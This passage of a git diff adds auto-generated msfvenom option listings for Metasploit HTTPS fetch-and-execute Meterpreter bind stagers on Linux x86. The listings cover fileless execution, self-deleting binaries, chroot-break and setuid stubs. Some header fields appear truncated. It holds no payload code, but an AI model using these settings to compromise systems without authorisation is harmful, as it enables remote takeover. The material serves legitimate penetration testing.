delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TObgXvbaK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Generate a tight loop in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..8724ace --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp: +========================= + +am_webb@rapid7.com> + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WArgZxVBXY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..8afca5c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid: +========================= + +b + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME nWDjYrvz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_nonx_tcp.txt new file mode 100644 index 0000000..780600a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_nonx_tcp.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp: +========================= + +m> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AZeAVAmQjERb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..ea92dad --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_tcp: +========================= + +william_webb@rapid7.com> + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tpmwvERqVxlW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..aec5ece --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp_uuid.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid: +========================= + +m Webb + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rZQaPXfpMj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 